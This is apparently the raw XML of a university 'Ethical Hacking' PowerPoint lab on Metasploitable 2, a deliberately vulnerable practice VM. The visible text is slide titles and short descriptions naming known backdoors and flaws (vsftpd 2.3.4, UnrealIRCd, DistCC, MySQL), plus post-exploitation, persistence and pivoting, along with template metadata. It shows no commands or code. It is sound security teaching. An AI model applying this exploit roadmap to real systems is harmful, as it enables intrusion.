              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Learn how to exploit multiple vulnerabilities on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform post-exploitation activities to gather information and maintain access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discuss the ethical implications of using such tools in real-world scenarios.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483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699E5-0F1F-E1D7-7E56-A5260F8AC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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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AED37-9C9A-E340-CB3E-B438DCB21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is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2 is a deliberately vulnerable Linux-based virtual machine designed to test and practice penetration testing techniques.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It has various vulnerabilities in services such as FTP, Telnet, SSH, and web services.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why Use It?: Provides a safe and isolated environment for learning and testing attacks using Metasploit without affecting real systems.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831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CF970-389A-7DFF-C135-04A75B2B0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Exploit Last week1: vsftpd 2.3.4 Backdoor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323C0-9B49-B10E-DD74-F8D2A2CBB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35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AE002-7ABF-34C6-34C7-397019A38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Exploit 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>UnrealIRCd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 3.2.8.1 Backdoor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E2834-2807-602A-F8FA-5F558019E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21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A096-3C0C-C8A8-F521-A2FA6FAA5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Exploit 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DistCC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Daemon Command Execution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D535A-08E7-4F48-D20B-DE83A9697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Vulnerability: The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DistCC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Daemon service allows unauthenticated remote command execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="243393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11D66-D737-78BA-47C0-8D8C235FA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Exploit 4: MySQL Authentication Bypass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AB6F9-4D17-ACDE-8651-674DBD634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Vulnerability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The MySQL service on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Metasploitable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has a weak authentication configuration, allowing attackers to bypass authentication.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1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E8E9C-147A-E8B3-479E-D299762A6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Post-Exploitation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4108A-E592-10BA-61BF-5D89F66CE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41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ch 16x9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 sz="28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2787990.potx" id="{BDB9CD5E-36EC-45F3-B87D-6D062B8A3823}" vid="{51682E2F-7C85-4D6F-AD40-072EFC83910D}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme2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PublishedLinkedAssetsLookup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LocLastLocAttemptVersionTypeLookup xmlns="4873beb7-5857-4685-be1f-d57550cc96cc" xsi:nil="true"/>
    <DirectSourceMarket xmlns="4873beb7-5857-4685-be1f-d57550cc96cc" xsi:nil="true"/>
    <ThumbnailAssetId xmlns="4873beb7-5857-4685-be1f-d57550cc96cc" xsi:nil="true"/>
    <PrimaryImageGen xmlns="4873beb7-5857-4685-be1f-d57550cc96cc">false</PrimaryImageGen>
    <LocNewPublishedVersionLookup xmlns="4873beb7-5857-4685-be1f-d57550cc96cc" xsi:nil="true"/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LocOverallPublishStatusLookup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LocOverallLocStatusLookup xmlns="4873beb7-5857-4685-be1f-d57550cc96cc" xsi:nil="true"/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1345093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This simple template design works for technology and  businesses, but it's versatile enough to use in other contexts.  It features multiple slide layouts designed for widescreen (16x9 resolution) and includes a sample SmartArt list and chart that are easily editable.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2011-11-26T00:30:00+00:00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TemplateStatus xmlns="4873beb7-5857-4685-be1f-d57550cc96cc">Complete</TemplateStatus>
    <Downloads xmlns="4873beb7-5857-4685-be1f-d57550cc96cc">0</Downloads>
    <OOCacheId xmlns="4873beb7-5857-4685-be1f-d57550cc96cc" xsi:nil="true"/>
    <IsDeleted xmlns="4873beb7-5857-4685-be1f-d57550cc96cc">false</IsDeleted>
    <LocPublishedDependentAssetsLookup xmlns="4873beb7-5857-4685-be1f-d57550cc96cc" xsi:nil="true"/>
    <TPExecutable xmlns="4873beb7-5857-4685-be1f-d57550cc96cc" xsi:nil="true"/>
    <EditorialTags xmlns="4873beb7-5857-4685-be1f-d57550cc96cc" xsi:nil="true"/>
    <SubmitterId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TP102787989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694266</LocLastLocAttemptVersionLookup>
    <LocProcessedForHandoffsLookup xmlns="4873beb7-5857-4685-be1f-d57550cc96cc" xsi:nil="true"/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LocOverallPreviewStatusLookup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 xsi:nil="true"/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LocProcessedForMarketsLookup xmlns="4873beb7-5857-4685-be1f-d57550cc96cc" xsi:nil="true"/>
    <TPLaunchHelpLinkType xmlns="4873beb7-5857-4685-be1f-d57550cc96cc">Template</TPLaunchHelpLinkType>
    <OriginalRelease xmlns="4873beb7-5857-4685-be1f-d57550cc96cc">15</OriginalRelease>
    <LocalizationTagsTaxHTField0 xmlns="4873beb7-5857-4685-be1f-d57550cc96cc">
      <Terms xmlns="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    </LocalizationTagsTaxHTField0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LocOverallHandbackStatusLookup xmlns="4873beb7-5857-4685-be1f-d57550cc96cc" xsi:nil="true"/>
    <ShowIn xmlns="4873beb7-5857-4685-be1f-d57550cc96cc">Show everywhere</ShowIn>
    <UANotes xmlns="4873beb7-5857-4685-be1f-d57550cc96cc" xsi:nil="true"/>
    <InternalTagsTaxHTField0 xmlns="4873beb7-5857-4685-be1f-d57550cc96cc">
      <Terms xmlns="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    </InternalTagsTaxHTField0>
    <CSXHash xmlns="4873beb7-5857-4685-be1f-d57550cc96cc" xsi:nil="true"/>
    <VoteCount xmlns="4873beb7-5857-4685-be1f-d57550cc96cc" xsi:nil="true"/>
    <AssetExpire xmlns="4873beb7-5857-4685-be1f-d57550cc96cc">2029-05-12T07:00:00+00:00</AssetExpire>
    <DSATActionTaken xmlns="4873beb7-5857-4685-be1f-d57550cc96cc" xsi:nil="true"/>
    <CSXSubmissionMarket xmlns="4873beb7-5857-4685-be1f-d57550cc96cc" xsi:nil="true"/>
    <LocMarketGroupTiers2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36F65B-1B07-41EE-A0E8-BC6EF38552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C67BEE-D13F-4BD2-98A5-34D8A0977F68}">
  <ds:schemaRefs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Triple circuit lines presentation (widescreen)</Template>
  <TotalTime>35270</TotalTime>
  <Words>1617</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>189</Paragraphs>
  <Slides>17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Times New Roman</vt:lpstr>
      <vt:lpstr>Tech 16x9</vt:lpstr>
      <vt:lpstr> Ethical Hacking In ECE</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Objectives</vt:lpstr>
      <vt:lpstr>Introduction to Metasploitable 2</vt:lpstr>
      <vt:lpstr>Exploit Last week1: vsftpd 2.3.4 Backdoor</vt:lpstr>
      <vt:lpstr>Exploit 2: UnrealIRCd 3.2.8.1 Backdoor</vt:lpstr>
      <vt:lpstr>Exploit 3: DistCC Daemon Command Execution</vt:lpstr>
      <vt:lpstr>Exploit 4: MySQL Authentication Bypass</vt:lpstr>
      <vt:lpstr>Post-Exploitation Techniques</vt:lpstr>
      <vt:lpstr>Setting Up Persistence</vt:lpstr>
      <vt:lpstr>Client-Side Exploits on Metasploitable 2</vt:lpstr>
      <vt:lpstr>Pivoting and Lateral Movement</vt:lpstr>
      <vt:lpstr>Advanced Exploitation Example</vt:lpstr>
      <vt:lpstr>Ethical Considerations</vt:lpstr>
      <vt:lpstr>Best Practices for Using Metasploit</vt:lpstr>
      <vt:lpstr>Troubleshooting Common Issues</vt:lpstr>
      <vt:lpstr>Lab Summary and Key Takeaways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Forensic Electrical Engineering</dc:title>
  <dc:creator>Si Roudani</dc:creator>
  <cp:lastModifiedBy>Roudani, Si Mohamed</cp:lastModifiedBy>
  <cp:revision>111</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-19T22:19:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-24T22:50:37Z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